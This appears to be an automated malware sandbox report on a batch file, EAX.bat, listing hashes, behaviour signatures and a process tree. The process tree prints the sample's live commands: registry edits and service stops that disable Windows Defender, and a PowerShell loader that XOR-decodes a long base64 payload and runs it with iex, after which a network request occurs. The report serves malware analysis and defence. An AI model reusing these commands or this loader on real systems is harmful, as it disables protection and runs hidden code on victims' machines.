Analysis
-
max time kernel
140s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
08-05-2024 21:46
Static task
static1
Behavioral task
behavioral1
Sample
EAX.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
EAX.bat
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
EAX.bat
Resource
win10v2004-20240226-en
General
-
Target
EAX.bat
-
Size
13KB
-
MD5
702ac05d7d2c6fcb005d0f072e7e1dee
-
SHA1
0538b012778f133432a0778fdb540292b9f6ef94
-
SHA256
d6df7159e2798c2e3a8d65c2a15d15bd85a9d4a73d1a196ba7bebc32113b20f9
-
SHA512
e9179fc17d850c840df69a5580c016155cba2cfad099cac1b74037fb16b77156035b948f0eec1ee78c17e8153eab33135fe6ae0f6ded9813e972b7585845c796
-
SSDEEP
384:+SopGvVZz6qws74S+ngzstcpshXrDUsDul0f6dniof5+tLohTleawO6jxi5Dm3u4:Ljmq97R+kpmDUXBK8w19mm3v
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 50 1896 powershell.exe -
pid Process 1896 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1896 powershell.exe Token: 33 2648 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2648 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1140 wrote to memory of 4696 1140 cmd.exe 92 PID 1140 wrote to memory of 4696 1140 cmd.exe 92 PID 4696 wrote to memory of 3688 4696 net.exe 93 PID 4696 wrote to memory of 3688 4696 net.exe 93 PID 1140 wrote to memory of 1196 1140 cmd.exe 94 PID 1140 wrote to memory of 1196 1140 cmd.exe 94 PID 1140 wrote to memory of 4312 1140 cmd.exe 95 PID 1140 wrote to memory of 4312 1140 cmd.exe 95 PID 1140 wrote to memory of 3292 1140 cmd.exe 96 PID 1140 wrote to memory of 3292 1140 cmd.exe 96 PID 3292 wrote to memory of 496 3292 net.exe 97 PID 3292 wrote to memory of 496 3292 net.exe 97 PID 1140 wrote to memory of 2420 1140 cmd.exe 98 PID 1140 wrote to memory of 2420 1140 cmd.exe 98 PID 2420 wrote to memory of 4584 2420 net.exe 99 PID 2420 wrote to memory of 4584 2420 net.exe 99 PID 1140 wrote to memory of 1896 1140 cmd.exe 107 PID 1140 wrote to memory of 1896 1140 cmd.exe 107
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EAX.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:3688
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4312
-
-
C:\Windows\system32\net.exenet stop WinDefend2⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend3⤵PID:496
-
-
-
C:\Windows\system32\net.exenet start WinDefend2⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start WinDefend3⤵PID:4584
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -encodedCommand $ h e h e h e   =   " N C c 8 M S Y 7 P T x y H j 0 9 O S c i F C c 8 M X I p X 1 h y c n J y A j M g M z 9 y e n Y / P T Y n P j c c M z 8 3 f n J 2 N C c 8 M S Y 7 P T w c M z 8 3 e 1 9 Y c n J y c n Y z I S E 3 P 3 J v c n o J E y I i F j 0 / M z s 8 D 2 h o E S c g I D c 8 J h Y 9 P z M 7 P H w V N y Y T I S E 3 P z A + O z c h e n t y L l 9 Y c n J y c g U 6 N y A 3 f x 0 w O D c x J n I p c n Y N f B U + P T A z P h M h I T c / M D 4 r E T M x O j d y f x M 8 N n J 2 D X w e P T E z J j s 9 P H w B I j 4 7 J n p 1 D g 5 1 e w l / Y w 9 8 X 1 h y c n J y c h c j J z M + I X p 1 A S s h J j c / f D Y + P n V 7 X 1 h y c n J y c i 9 7 f B U 3 J g Y r I j d 6 d R 8 7 M S A 9 I T 0 0 J n w F O z x h Y H w H P C E z N D c c M y Y 7 J D c f N y Y 6 P T Y h d X t f W H J y c n J 2 J j 8 i b x J 6 e 1 9 Y c n J y c n Y z I S E 3 P 3 w V N y Y f N y Y 6 P T Y h e n t y L n I U P S A X M z E 6 f x 0 w O D c x J n I p G z R 6 d g 1 8 H D M / N 3 J / P j s 5 N 3 J w F T d 4 A n g 9 M X g 2 N i A 3 I S F w e 3 I p d i Y / I n l v d g 0 v L 1 9 Y c n J y c i A 3 J i c g P H J 2 J j 8 i C W I P f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 y E n p 6 d j M h I T c / f B U 3 J h 8 3 J j o 9 N n p 1 F T c m H z 0 2 J z 4 3 G j M 8 N j 4 3 d X t 7 f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 f W B J 6 d j 8 9 N i c + N x w z P z d 7 e 3 5 y d j Q n P D E m O z 0 8 H D M / N 3 t 7 X 1 g v X 1 h f W F 9 Y N C c 8 M S Y 7 P T x y N T c m F j c + N z U z J j c G K y I 3 c i l f W H J y c n I C M y A z P 3 J 6 X 1 h y c n J y c g k C M y A z P z c m N y B 6 A j 0 h O y Y 7 P T x y b 3 J i f n I f M z w 2 M y Y 9 I C t y b 3 J 2 B i A n N 3 s P c g k G K y I 3 C Q 8 P X 1 h y c n J y c n Y 0 J z w x f n I J A j M g M z 8 3 J j c g e g I 9 I T s m O z 0 8 c m 9 y Y 3 s P c g k G K y I 3 D 3 J 2 N j c + B i s i N 3 J v c g k E P T s 2 D 1 9 Y c n J y c n t f W H J y c n J 2 J i s i N 3 J v c g k T I i I W P T 8 z O z w P a G g R J y A g N z w m F j 0 / M z s 8 f F 9 Y c n J y c h Y 3 N D s 8 N x Y r P D M / O z E T I S E 3 P z A + K 3 p 6 H D c l f x 0 w O D c x J n I B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w T I S E 3 P z A + K x w z P z d 6 d Q A 3 N D 4 3 M S Y 3 N h Y 3 P j c 1 M y Y 3 d X t 7 f l 9 Y C Q E r I S Y 3 P 3 w A N z Q + N z E m O z 0 8 f B c / O y Z 8 E y E h N z 8 w P i s Q J z s + N j c g E z E x N y E h D 2 h o A C c 8 e 3 x f W H J y c n I W N z Q 7 P D c W K z w z P z s x H z 0 2 J z 4 3 e n U b P B 8 3 P z 0 g K x 8 9 N i c + N 3 V + c n Y 0 M z 4 h N 3 t 8 X 1 h y c n J y F j c 0 O z w 3 B i s i N 3 p 1 H y s W N z 4 3 N T M m N w Y r I j d 1 f n J 1 E T 4 z I S F + c g I n M D 4 7 M X 5 y A T c z P j c 2 f n I T P C E 7 E T 4 z I S F + X 1 h y c n J y E y c m P R E + M y E h d X 5 y C Q E r I S Y 3 P 3 w f J z 4 m O z E z I S Y W N z 4 3 N T M m N w 9 7 X 1 h f W H J y d i Y r I j d 8 X 1 h y c n J y F j c 0 O z w 3 E T 0 8 I S Y g J z E m P S B 6 d Q A G A S I 3 M T s z P h w z P z d + c h o 7 N j c Q K w E 7 N X 5 y A i c w P j s x d X 5 f W A k B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w R M z 4 + O z w 1 E T 0 8 J D c 8 J j s 9 P C E P a G g B J j M 8 N j M g N n 5 y d j Q n P D F 7 f F 9 Y c n J y c n I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W F 9 Y c n J 2 J i s i N 3 x f W H J y c n I W N z Q 7 P D c f N y Y 6 P T Z 6 d R s 8 J D 0 5 N 3 V + c n U C J z A + O z F + c h o 7 N j c Q K w E 7 N X 5 y H D c l A T 4 9 J n 5 y B D s g J i c z P n V + c n Y 2 N z 4 G K y I 3 f l 9 Y d j Q n P D F 7 f H I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W H J y c n I g N y Y n I D x y d i Y r I j d 8 E S A 3 M y Y 3 B i s i N 3 p 7 X 1 g v X 1 h f W F 9 Y C R s 8 J g I m I A 9 2 N C c 8 M R M 2 N i B y b 3 I e P T 0 5 J y I U J z w x c j M / I T t 8 N j 4 + c h M / I T s d I j c 8 A T c h I T s 9 P F 9 Y d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B y b 3 J i X 1 h 2 J C J v C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o F T c m F j c + N z U z J j c U P S A U J z w x J j s 9 P A I 9 O z w m N y B 6 e h 4 9 P T k n I h Q n P D F y O T c g P D c + Y W B 8 N j 4 + c g Q 7 I C Y n M z 4 C I D 0 m N z E m e 3 5 y e j U 3 J h Y 3 P j c 1 M y Y 3 B i s i N 3 I S e g k b P C Y C J i A P f n I J B x s 8 J m F g D 3 5 y C Q c b P C Z h Y A 9 + c g k H G z w m Y W A P f B 8 z O T c Q K w A 3 N A Y r I j d 6 e 3 t y e g k Q P T 0 + D 3 t 7 e 1 9 Y d i Q i f B s 8 J D 0 5 N 3 p 2 N C c 8 M R M 2 N i B + c m F + c m I q Z m J + c g k g N z Q P d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B 7 X 1 h 2 M C c 0 c m 9 y C R A r J j c J D w 9 y e m I q Z m p + Y i p h Y 3 5 i K j F r e 1 9 Y C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o E T 0 i K 3 p 2 M C c 0 f n J i f n J 2 N C c 8 M R M 2 N i B + c m F 7 X 1 g l N T c m c n A 6 J i Y i I W h 9 f T R m Z z E x N m N m f z E 2 Y T R / Z m V m M 3 9 q a m s 3 f z Y 3 Y z N i a 2 B n M W R h Y n 9 i Y n 8 5 I m U j M y U z M D 0 h J T N 8 I D s 5 N y B 8 I D c i P j s m f D Y 3 J H 0 A N z U 7 I S Y g M y Y 7 P T x 8 N y o 3 f n B y f x 1 y c B F o D g c h N y A h D n Y 3 P C R o B w E X A B w T H x c O E y I i F j M m M w 4 e P T E z P g 4 G N z 8 i D g A 3 N T s h J i A z J j s 9 P H w 3 K j d w X 1 g B J j M g J n 8 C I D 0 x N y E h c n 8 U O z 4 3 A j M m O n J w E W g O B y E 3 I C E O d j c 8 J G g H A R c A H B M f F w 4 T I i I W M y Y z D h 4 9 M T M + D g Y 3 P y I O A D c 1 O y E m I D M m O z 0 8 f D c q N 3 B y "  
 $ X o r _ V a l   =   8 2  
 $ x r   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ h e h e h e )  
 $ f a f a f   =   $ x r   |   F o r E a c h - O b j e c t   {   r e t u r n   $ _   - b x o r   $ X o r _ V a l   }  
 $ d e c s c r   =   [ t e x t . e n c o d i n g ] : : u t f 8 . G e t S t r i n g ( $ f a f a f )  
 i e x   $ d e c s c r  
 2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3792 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:81⤵PID:4024
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f4 0x5041⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82